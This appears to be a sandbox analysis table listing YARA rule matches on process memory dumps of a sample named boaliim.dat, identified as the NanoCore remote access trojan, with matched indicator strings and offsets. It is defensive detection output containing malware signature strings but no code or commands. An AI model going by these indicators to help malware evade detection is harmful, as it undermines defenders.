0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1af33:$a1: NanoCore.ClientPluginHost 0x2b165:$a1: NanoCore.ClientPluginHost 0x382df:$a1: NanoCore.ClientPluginHost 0x4213f:$a1: NanoCore.ClientPluginHost 0x4a075:$a1: NanoCore.ClientPluginHost 0x50058:$a1: NanoCore.ClientPluginHost 0x59ad3:$a1: NanoCore.ClientPluginHost 0x63f0f:$a1: NanoCore.ClientPluginHost 0x6ef01:$a1: NanoCore.ClientPluginHost 0x7acb7:$a1: NanoCore.ClientPluginHost 0x86a0e:$a1: NanoCore.ClientPluginHost 0x1af0e:$a2: NanoCore.ClientPlugin 0x2b13f:$a2: NanoCore.ClientPlugin 0x3835b:$a2: NanoCore.ClientPlugin 0x421bb:$a2: NanoCore.ClientPlugin 0x4a0ef:$a2: NanoCore.ClientPlugin 0x500a2:$a2: NanoCore.ClientPlugin 0x59bbd:$a2: NanoCore.ClientPlugin 0x63faf:$a2: NanoCore.ClientPlugin 0x6eed8:$a2: NanoCore.ClientPlugin 0x7ac8e:$a2: NanoCore.ClientPlugin
0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x13a8:$x1: NanoCore.ClientPluginHost
0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x13f2:$x2: NanoCore.ClientPlugin 0x13a8:$x3: NanoCore.ClientPluginHost 0x1408:$i3: IClientNetwork 0x13c2:$i6: IClientLoggingHost 0x1185:$s1: ClientPlugin 0x13fb:$s1: ClientPlugin
0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x13a8:$a1: NanoCore.ClientPluginHost 0x13f2:$a2: NanoCore.ClientPlugin 0x13c2:$b9: IClientLoggingHost
0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
0000000D.00000002.648734115.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost
0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x34259:$a1: NanoCore.ClientPluginHost 0x3988a:$a1: NanoCore.ClientPluginHost 0x3421c:$a2: NanoCore.ClientPlugin 0x398d4:$a2: NanoCore.ClientPlugin 0x345f0:$b1: get_BuilderSettings 0x342a7:$b4: IClientAppHost 0x34661:$b6: AddHostEntry 0x346d0:$b7: LogClientException 0x34645:$b8: PipeExists 0x34294:$b9: IClientLoggingHost 0x398a4:$b9: IClientLoggingHost
00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xfdd5:$x1: NanoCore.ClientPluginHost 0xfe12:$x2: IClientNetworkHost 0x13945:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfb3d:$a: NanoCore 0xfb4d:$a: NanoCore 0xfd81:$a: NanoCore 0xfd95:$a: NanoCore 0xfdd5:$a: NanoCore 0xfb9c:$b: ClientPlugin 0xfd9e:$b: ClientPlugin 0xfdde:$b: ClientPlugin 0xfcc3:$c: ProjectData 0x106ca:$d: DESCrypto 0x18096:$e: KeepAlive 0x16084:$g: LogClientMessage 0x1227f:$i: get_Connected 0x10a00:$j: #=q 0x10a30:$j: #=q 0x10a4c:$j: #=q 0x10a7c:$j: #=q 0x10a98:$j: #=q 0x10ab4:$j: #=q 0x10ae4:$j: #=q 0x10b00:$j: #=q
00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xfdd5:$a1: NanoCore.ClientPluginHost 0xfd95:$a2: NanoCore.ClientPlugin 0x11cee:$b1: get_BuilderSettings 0xfbf1:$b2: ClientLoaderForm.resources 0x1140e:$b3: PluginCommand 0xfdc6:$b4: IClientAppHost 0x1a246:$b5: GetBlockHash 0x12346:$b6: AddHostEntry 0x16039:$b7: LogClientException 0x122b3:$b8: PipeExists 0xfdff:$b9: IClientLoggingHost
0000000D.00000003.511336975.00000000074D8000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x3b1:$a1: NanoCore.ClientPluginHost 0x38c:$a2: NanoCore.ClientPlugin 0x3a2:$b4: IClientAppHost 0x4891:$b7: LogClientException 0x3db:$b9: IClientLoggingHost
0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x34e2:$x2: NanoCore.ClientPlugin 0x350b:$x3: NanoCore.ClientPluginHost 0x34d3:$i3: IClientNetwork 0x34f8:$i6: IClientLoggingHost 0x3525:$i7: IClientNetworkHost 0x334e:$s1: ClientPlugin 0x34eb:$s1: ClientPlugin
0000000D.00000002.651471493.0000000007B10000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x350b:$a1: NanoCore.ClientPluginHost 0x34e2:$a2: NanoCore.ClientPlugin 0x5854:$b7: LogClientException 0x34f8:$b9: IClientLoggingHost
0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5fc9:$x2: NanoCore.ClientPlugin 0x5fee:$x3: NanoCore.ClientPluginHost 0x5fba:$i3: IClientNetwork 0x5fdf:$i4: IClientAppHost 0x6008:$i5: IClientDataHost 0x6018:$i6: IClientLoggingHost 0x602b:$i7: IClientNetworkHost 0x603e:$i8: IClientUIHost 0x604c:$i9: IClientNameObjectCollection 0x5d70:$s1: ClientPlugin 0x5fd2:$s1: ClientPlugin
0000000D.00000002.651756992.0000000007B60000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5fee:$a1: NanoCore.ClientPluginHost 0x5fc9:$a2: NanoCore.ClientPlugin 0x5fdf:$b4: IClientAppHost 0xa4ce:$b7: LogClientException 0x6018:$b9: IClientLoggingHost
0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5ad5:$x2: NanoCore.ClientPlugin 0x59eb:$x3: NanoCore.ClientPluginHost 0x5aeb:$i3: IClientNetwork 0x5a24:$i5: IClientDataHost 0x5a05:$i6: IClientLoggingHost 0x5b48:$i7: IClientNetworkHost 0x5a43:$i8: IClientUIHost 0x6955:$i9: IClientNameObjectCollection 0x54fc:$s1: ClientPlugin 0x5ade:$s1: ClientPlugin 0x6971:$s6: get_ClientSettings
0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x59eb:$a1: NanoCore.ClientPluginHost 0x5ad5:$a2: NanoCore.ClientPlugin 0x732e:$b7: LogClientException 0x6941:$b8: PipeExists 0x5a05:$b9: IClientLoggingHost
00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xf535:$x1: NanoCore.ClientPluginHost 0x2bcd5:$x1: NanoCore.ClientPluginHost 0xf572:$x2: IClientNetworkHost 0x2bd12:$x2: IClientNetworkHost 0x130a5:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x2f845:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xf29d:$a: NanoCore 0xf2ad:$a: NanoCore 0xf4e1:$a: NanoCore 0xf4f5:$a: NanoCore 0xf535:$a: NanoCore 0x2ba3d:$a: NanoCore 0x2ba4d:$a: NanoCore 0x2bc81:$a: NanoCore 0x2bc95:$a: NanoCore 0x2bcd5:$a: NanoCore 0xf2fc:$b: ClientPlugin 0xf4fe:$b: ClientPlugin 0xf53e:$b: ClientPlugin 0x2ba9c:$b: ClientPlugin 0x2bc9e:$b: ClientPlugin 0x2bcde:$b: ClientPlugin 0xf423:$c: ProjectData 0x2bbc3:$c: ProjectData 0xfe2a:$d: DESCrypto 0x2c5ca:$d: DESCrypto 0x177f6:$e: KeepAlive
00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf535:$a1: NanoCore.ClientPluginHost 0x2bcd5:$a1: NanoCore.ClientPluginHost 0xf4f5:$a2: NanoCore.ClientPlugin 0x2bc95:$a2: NanoCore.ClientPlugin 0x1144e:$b1: get_BuilderSettings 0x2dbee:$b1: get_BuilderSettings 0xf351:$b2: ClientLoaderForm.resources 0x2baf1:$b2: ClientLoaderForm.resources 0x10b6e:$b3: PluginCommand 0x2d30e:$b3: PluginCommand 0xf526:$b4: IClientAppHost 0x2bcc6:$b4: IClientAppHost 0x199a6:$b5: GetBlockHash 0x36146:$b5: GetBlockHash 0x11aa6:$b6: AddHostEntry 0x2e246:$b6: AddHostEntry 0x15799:$b7: LogClientException 0x31f39:$b7: LogClientException 0x11a13:$b8: PipeExists 0x2e1b3:$b8: PipeExists 0xf55f:$b9: IClientLoggingHost
0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x1646:$x1: NanoCore.ClientPluginHost
0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x1646:$x2: NanoCore.ClientPluginHost 0x1724:$s4: PipeCreated 0x1660:$s5: IClientLoggingHost
0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1690:$x2: NanoCore.ClientPlugin 0x1646:$x3: NanoCore.ClientPluginHost 0x16a6:$i3: IClientNetwork 0x1660:$i6: IClientLoggingHost 0x13df:$s1: ClientPlugin 0x1699:$s1: ClientPlugin
0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1646:$a1: NanoCore.ClientPluginHost 0x1690:$a2: NanoCore.ClientPlugin 0x1660:$b9: IClientLoggingHost
00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xffad:$x1: NanoCore.ClientPluginHost 0xffea:$x2: IClientNetworkHost 0x13b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfd15:$a: NanoCore 0xfd25:$a: NanoCore 0xff59:$a: NanoCore 0xff6d:$a: NanoCore 0xffad:$a: NanoCore 0xfd74:$b: ClientPlugin 0xff76:$b: ClientPlugin 0xffb6:$b: ClientPlugin 0xfe9b:$c: ProjectData 0x108a2:$d: DESCrypto 0x1826e:$e: KeepAlive 0x1625c:$g: LogClientMessage 0x12457:$i: get_Connected 0x10bd8:$j: #=q 0x10c08:$j: #=q 0x10c24:$j: #=q 0x10c54:$j: #=q 0x10c70:$j: #=q 0x10c8c:$j: #=q 0x10cbc:$j: #=q 0x10cd8:$j: #=q
00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xffad:$a1: NanoCore.ClientPluginHost 0xff6d:$a2: NanoCore.ClientPlugin 0x11ec6:$b1: get_BuilderSettings 0xfdc9:$b2: ClientLoaderForm.resources 0x115e6:$b3: PluginCommand 0xff9e:$b4: IClientAppHost 0x1a41e:$b5: GetBlockHash 0x1251e:$b6: AddHostEntry 0x16211:$b7: LogClientException 0x1248b:$b8: PipeExists 0xffd7:$b9: IClientLoggingHost
0000000D.00000003.511098071.00000000074D7000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1f71:$a1: NanoCore.ClientPluginHost 0x1f48:$a2: NanoCore.ClientPlugin 0x6f9c:$b7: LogClientException 0x1f5e:$b9: IClientLoggingHost
0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x17ee:$a1: NanoCore.ClientPluginHost 0x1a795:$a1: NanoCore.ClientPluginHost 0x17b9:$a2: NanoCore.ClientPlugin 0x1a760:$a2: NanoCore.ClientPlugin 0x6734:$b1: get_BuilderSettings 0x1f6db:$b1: get_BuilderSettings 0x66a3:$b7: LogClientException 0x1f64a:$b7: LogClientException 0x1808:$b9: IClientLoggingHost 0x1a7af:$b9: IClientLoggingHost
0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0xf78e:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin 0xf781:$s1: ClientPlugin 0x147a2:$s6: get_ClientSettings
0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf7ad:$a1: NanoCore.ClientPluginHost 0xf778:$a2: NanoCore.ClientPlugin 0x146f3:$b1: get_BuilderSettings 0x14662:$b7: LogClientException 0xf7c7:$b9: IClientLoggingHost
00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x10de5:$x1: NanoCore.ClientPluginHost 0x10e22:$x2: IClientNetworkHost 0x14955:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10b4d:$a: NanoCore 0x10b5d:$a: NanoCore 0x10d91:$a: NanoCore 0x10da5:$a: NanoCore 0x10de5:$a: NanoCore 0x10bac:$b: ClientPlugin 0x10dae:$b: ClientPlugin 0x10dee:$b: ClientPlugin 0x10cd3:$c: ProjectData 0x116da:$d: DESCrypto 0x190a6:$e: KeepAlive 0x17094:$g: LogClientMessage 0x1328f:$i: get_Connected 0x11a10:$j: #=q 0x11a40:$j: #=q 0x11a5c:$j: #=q 0x11a8c:$j: #=q 0x11aa8:$j: #=q 0x11ac4:$j: #=q 0x11af4:$j: #=q 0x11b10:$j: #=q
00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x10de5:$a1: NanoCore.ClientPluginHost 0x10da5:$a2: NanoCore.ClientPlugin 0x12cfe:$b1: get_BuilderSettings 0x10c01:$b2: ClientLoaderForm.resources 0x1241e:$b3: PluginCommand 0x10dd6:$b4: IClientAppHost 0x1b256:$b5: GetBlockHash 0x13356:$b6: AddHostEntry 0x17049:$b7: LogClientException 0x132c3:$b8: PipeExists 0x10e0f:$b9: IClientLoggingHost
0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x5b0b:$x1: NanoCore.ClientPluginHost 0x5b44:$x2: IClientNetworkHost
0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth (Nextron Systems)	0x5b0b:$x2: NanoCore.ClientPluginHost 0x5c0f:$s4: PipeCreated 0x5b25:$s5: IClientLoggingHost
0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5b87:$x2: NanoCore.ClientPlugin 0x5b0b:$x3: NanoCore.ClientPluginHost 0x5b9d:$i3: IClientNetwork 0x5b25:$i6: IClientLoggingHost 0x5b44:$i7: IClientNetworkHost 0x57fb:$s1: ClientPlugin 0x5b90:$s1: ClientPlugin 0x6cf4:$s3: IPAddress
0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5b0b:$a1: NanoCore.ClientPluginHost 0x5b87:$a2: NanoCore.ClientPlugin 0x6710:$b7: LogClientException 0x5b25:$b9: IClientLoggingHost
0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x19e6f:$a: NanoCore 0x19e94:$a: NanoCore 0x19eed:$a: NanoCore 0x2a08c:$a: NanoCore 0x2a0b2:$a: NanoCore 0x2a10e:$a: NanoCore 0x36f65:$a: NanoCore 0x36fbe:$a: NanoCore 0x36ff1:$a: NanoCore 0x3721d:$a: NanoCore 0x37299:$a: NanoCore 0x378b2:$a: NanoCore 0x379fb:$a: NanoCore 0x37ecf:$a: NanoCore 0x381b6:$a: NanoCore 0x381cd:$a: NanoCore 0x41071:$a: NanoCore 0x410ed:$a: NanoCore 0x439d0:$a: NanoCore 0x48f99:$a: NanoCore 0x49013:$a: NanoCore
0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x19e94:$a1: NanoCore.ClientPluginHost 0x2a0b2:$a1: NanoCore.ClientPluginHost 0x3721d:$a1: NanoCore.ClientPluginHost 0x41071:$a1: NanoCore.ClientPluginHost 0x48f99:$a1: NanoCore.ClientPluginHost 0x4ef6c:$a1: NanoCore.ClientPluginHost 0x589da:$a1: NanoCore.ClientPluginHost 0x62e07:$a1: NanoCore.ClientPluginHost 0x6dde6:$a1: NanoCore.ClientPluginHost 0x79b8a:$a1: NanoCore.ClientPluginHost 0x9ea90:$a1: NanoCore.ClientPluginHost 0xaded2:$a1: NanoCore.ClientPluginHost 0xd54db:$a1: NanoCore.ClientPluginHost 0x12fe30:$a1: NanoCore.ClientPluginHost 0x13989c:$a1: NanoCore.ClientPluginHost 0x143cc7:$a1: NanoCore.ClientPluginHost 0x14eca4:$a1: NanoCore.ClientPluginHost 0x15aa46:$a1: NanoCore.ClientPluginHost 0x17f94a:$a1: NanoCore.ClientPluginHost 0x18ed8a:$a1: NanoCore.ClientPluginHost 0x19e6f:$a2: NanoCore.ClientPlugin
0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x18d1:$a: NanoCore 0x192a:$a: NanoCore 0x1967:$a: NanoCore 0x19e0:$a: NanoCore 0x6f75:$a: NanoCore 0x6fbf:$a: NanoCore 0x71a9:$a: NanoCore 0x1aac8:$a: NanoCore 0x1aadd:$a: NanoCore 0x1ab12:$a: NanoCore 0x28727:$a: NanoCore 0x2874c:$a: NanoCore 0x287a5:$a: NanoCore 0x38942:$a: NanoCore 0x38968:$a: NanoCore 0x389c4:$a: NanoCore 0x45819:$a: NanoCore 0x45872:$a: NanoCore 0x458a5:$a: NanoCore 0x45ad1:$a: NanoCore 0x45b4d:$a: NanoCore
0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1967:$a1: NanoCore.ClientPluginHost 0x6f75:$a1: NanoCore.ClientPluginHost 0x1ab12:$a1: NanoCore.ClientPluginHost 0x2874c:$a1: NanoCore.ClientPluginHost 0x38968:$a1: NanoCore.ClientPluginHost 0x45ad1:$a1: NanoCore.ClientPluginHost 0x4c01f:$a1: NanoCore.ClientPluginHost 0x51ff0:$a1: NanoCore.ClientPluginHost 0x5ba5c:$a1: NanoCore.ClientPluginHost 0x65e87:$a1: NanoCore.ClientPluginHost 0x70e64:$a1: NanoCore.ClientPluginHost 0x7cc06:$a1: NanoCore.ClientPluginHost 0xa1b0a:$a1: NanoCore.ClientPluginHost 0xb0f4a:$a1: NanoCore.ClientPluginHost 0x192a:$a2: NanoCore.ClientPlugin 0x6fbf:$a2: NanoCore.ClientPlugin 0x1aadd:$a2: NanoCore.ClientPlugin 0x28727:$a2: NanoCore.ClientPlugin 0x38942:$a2: NanoCore.ClientPlugin 0x45b4d:$a2: NanoCore.ClientPlugin 0x4c099:$a2: NanoCore.ClientPlugin
Process Memory Space: boaliim.dat PID: 7512	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth (Nextron Systems)	0x8acf9:$x1: NanoCore.ClientPluginHost 0x1722e0:$x1: NanoCore.ClientPluginHost 0x195d2d:$x1: NanoCore.ClientPluginHost 0x67a8ae:$x1: NanoCore.ClientPluginHost 0x76cf40:$x1: NanoCore.ClientPluginHost 0x80794f:$x1: NanoCore.ClientPluginHost 0x88ffe8:$x1: NanoCore.ClientPluginHost 0x8ad36:$x2: IClientNetworkHost 0x17231d:$x2: IClientNetworkHost 0x195d6a:$x2: IClientNetworkHost 0x67a8eb:$x2: IClientNetworkHost 0x76cf7d:$x2: IClientNetworkHost 0x80798c:$x2: IClientNetworkHost 0x890025:$x2: IClientNetworkHost 0x8e827:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x998ad:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x175e0e:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x180e94:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x18cf72:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x19985b:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x1a48e1:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: boaliim.dat PID: 7512	JoeSecurity_AntiVM_1	Yara detected AntiVM autoit script	Joe Security
Process Memory Space: boaliim.dat PID: 7512	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
